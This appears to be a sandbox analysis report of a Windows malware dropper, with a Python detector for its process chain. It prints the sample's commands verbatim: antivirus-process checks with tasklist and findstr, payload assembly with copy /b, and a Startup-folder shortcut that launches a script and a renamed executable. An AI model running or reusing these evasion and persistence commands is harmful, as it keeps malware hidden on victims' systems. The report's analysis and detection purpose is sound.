Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_0069B02015_2_0069B020
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006994E015_2_006994E0
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_00699C8015_2_00699C80
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006B23F515_2_006B23F5
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_0071840015_2_00718400
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006C650215_2_006C6502
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006C265E15_2_006C265E
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_0069E6F0
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006B282A
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006C89BF
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006C6A74
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_00710A3A
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006A0BE0
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006BCD51
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006EEDB2
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006F8E44
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_00710EB7
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006C6FE6
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006B33B7
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006AD45D
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006BF409
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_00691663
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006AF628
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_0069F6A0
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006B16B4
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006B78C3
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006B1BA8
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006BDBA5
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006C9CE5
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006ADD28
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006B1FC0
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006BBFD6
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\585723\Designing.pif 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: String function: 00B41A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: String function: 00B58B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: String function: 00B50D17 appears 70 times
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: String function: 006B0D17 appears 70 times
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: String function: 006A1A36 appears 34 times
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: String function: 006B8B30 appears 42 times
Source: C3KzPHU3UG.exe | Static PE information: invalid certificate
Source: C3KzPHU3UG.exe, 00000000.00000002.1653619753.00000000007B0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs C3KzPHU3UG.exe
Source: C3KzPHU3UG.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal80.expl.evad.winEXE@28/15@2/0
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9A6AD GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B88DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B89399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006E8DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006E9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Code function: 0_2_0040400B GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B94148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Code function: 0_2_00402218 CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | File created: C:\Users\user\AppData\Local\SyncTech Innovations
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | File created: C:\Users\user\AppData\Local\Temp\nshE67D.tmp
Source: C3KzPHU3UG.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C3KzPHU3UG.exe | ReversingLabs: Detection: 33%
Source: C3KzPHU3UG.exe | Virustotal: Detection: 36%
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | File read: C:\Users\user\Desktop\C3KzPHU3UG.exe
Source: unknown | Process created: C:\Users\user\Desktop\C3KzPHU3UG.exe "C:\Users\user\Desktop\C3KzPHU3UG.exe"
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 585723
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "TranscriptHousesConstitutesMedicaid" Hate
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Rod + ..\Keep + ..\Prep + ..\Tsunami + ..\Invitations F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\585723\Designing.pif Designing.pif F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & echo URL="C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif" "C:\Users\user\AppData\Local\SyncTech Innovations\p"
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 585723
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "TranscriptHousesConstitutesMedicaid" Hate
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Rod + ..\Keep + ..\Prep + ..\Tsunami + ..\Invitations F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\585723\Designing.pif Designing.pif F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & echo URL="C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & exit
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif" "C:\Users\user\AppData\Local\SyncTech Innovations\p"
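The process rows above carry the three behaviours a detection engineer would want to encode from this sample: two `tasklist` / `findstr /I` pairs under one cmd.exe that look for antivirus processes, Designing.pif driving cmd.exe to `echo` an [InternetShortcut] into the Startup folder, and wscript.exe launching a .pif (a renamed PE) from the dropped directory. The Python below is an added example, not Joe Sandbox or Sigma code: it evaluates those three checks over Sysmon-style process-creation events. The images and command lines are copied from the rows above; the PIDs and parent PIDs are invented, and the `make_event` helper and `EVENTS` list are part of the example. One caveat for anyone pivoting on telemetry: the WMI `Win32_Process` queries attributed to tasklist.exe above are how tasklist itself is implemented, so the useful signal is the tasklist/findstr pair under a single cmd.exe, not the WMI query.

```python
"""Process-chain checks for this report, run over constructed Sysmon-style
process-creation events. Added example, not Joe Sandbox or Sigma code; images
and command lines are from the Process created rows, PIDs/PPIDs are invented."""
import re

# Process names the sample greps for: copied from its two findstr /I command lines.
AV_PROCESS_NAMES = {
    "wrsa.exe", "opssvc.exe", "avastui.exe", "avgui.exe",
    "bdservicehost.exe", "ekrn.exe", "nswscsvc.exe", "sophoshealth.exe",
}
STARTUP_DIR_FRAGMENT = "\\microsoft\\windows\\start menu\\programs\\startup\\"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
RENAMED_PE_EXT = {".pif", ".scr", ".com"}
EXE_RE = re.compile(r"[\w.-]+\.exe", re.I)
SCRIPT_PATH_RE = re.compile(r"[\w:\\ .-]+\.(?:js|jse|vbs|vbe|wsf|hta|cmd|bat|ps1)\b", re.I)


def image_name(image):
    """Lower-cased file name of an image path (either slash style)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def image_ext(image):
    name = image_name(image)
    return "." + name.rsplit(".", 1)[-1] if "." in name else ""


def detect_av_process_search(events):
    """findstr whose search terms name AV processes, with a tasklist under the
    same parent: the `tasklist | findstr /I "..."` idiom. Returns (pid, names)."""
    by_parent = {}
    for e in events:
        by_parent.setdefault(e["ppid"], []).append(e)
    hits = []
    for e in events:
        if image_name(e["image"]) != "findstr.exe":
            continue
        matched = {t.lower() for t in EXE_RE.findall(e["cmdline"])} & AV_PROCESS_NAMES
        siblings = by_parent.get(e["ppid"], [])
        if matched and any(image_name(s["image"]) == "tasklist.exe" for s in siblings):
            hits.append((e["pid"], sorted(matched)))
    return hits


def detect_startup_script_drop(events):
    """cmd.exe writing into a Startup folder with echo redirection; returns the
    script paths named in the redirected text (the .url -> .js hand-off here)."""
    hits = []
    for e in events:
        cl = e["cmdline"]
        if image_name(e["image"]) != "cmd.exe" or ">" not in cl or "echo" not in cl.lower():
            continue
        if STARTUP_DIR_FRAGMENT in cl.lower():
            hits.append((e["pid"], SCRIPT_PATH_RE.findall(cl)))
    return hits


def detect_script_host_launching_renamed_pe(events):
    """wscript/cscript spawning a child whose image ends in .pif/.scr/.com."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent and image_name(parent["image"]) in SCRIPT_HOSTS and image_ext(e["image"]) in RENAMED_PE_EXT:
            hits.append((parent["pid"], e["pid"], e["image"]))
    return hits


def make_event(pid, ppid, image, cmdline):
    return {"pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline}


# Constructed events mirroring the report's process tree (PIDs are made up).
STARTUP_URL = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url"
APP_DIR = r"C:\Users\user\AppData\Local\SyncTech Innovations"
EVENTS = [
    make_event(100, 1, r"C:\Users\user\Desktop\C3KzPHU3UG.exe", r'"C:\Users\user\Desktop\C3KzPHU3UG.exe"'),
    make_event(200, 100, r"C:\Windows\SysWOW64\cmd.exe",
               r'"C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exit'),
    make_event(201, 200, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    make_event(202, 200, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "wrsa.exe opssvc.exe"'),
    make_event(203, 200, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    make_event(204, 200, r"C:\Windows\SysWOW64\findstr.exe",
               'findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"'),
    make_event(205, 200, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /V "TranscriptHousesConstitutesMedicaid" Hate'),
    make_event(300, 200, r"C:\Users\user\AppData\Local\Temp\585723\Designing.pif", "Designing.pif F"),
    make_event(301, 300, r"C:\Windows\SysWOW64\cmd.exe",
               'cmd /k echo [InternetShortcut] > "%s" & echo URL="%s\\EchoSync.js" >> "%s" & exit'
               % (STARTUP_URL, APP_DIR, STARTUP_URL)),
    make_event(400, 1, r"C:\Windows\System32\wscript.exe", '"C:\\Windows\\System32\\WScript.exe" "%s\\EchoSync.js"' % APP_DIR),
    make_event(401, 400, APP_DIR + r"\EchoSync.pif", '"%s\\EchoSync.pif" "%s\\p"' % (APP_DIR, APP_DIR)),
]
```

Each detector returns the matching PIDs so a rule can be tuned on its own: the AV check requires the tasklist sibling so that a lone `findstr` over a log file does not fire, the Startup check keys on the folder fragment rather than the file name, and the script-host check looks at the child's extension rather than its directory, so it also covers drops outside AppData.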
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Code function: 0_2_00405BBF GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B5E93F push edi; ret 10_2_00B5E941
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B5EA58 push esi; ret 10_2_00B5EA5A
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B58B75 push ecx; ret 10_2_00B58B88
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B5EC33 push esi; ret 10_2_00B5EC35
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B5ED1C push edi; ret 10_2_00B5ED1E
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006B8B75 push ecx; ret 15_2_006B8B88

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\585723\Designing.pif
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | File created: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif
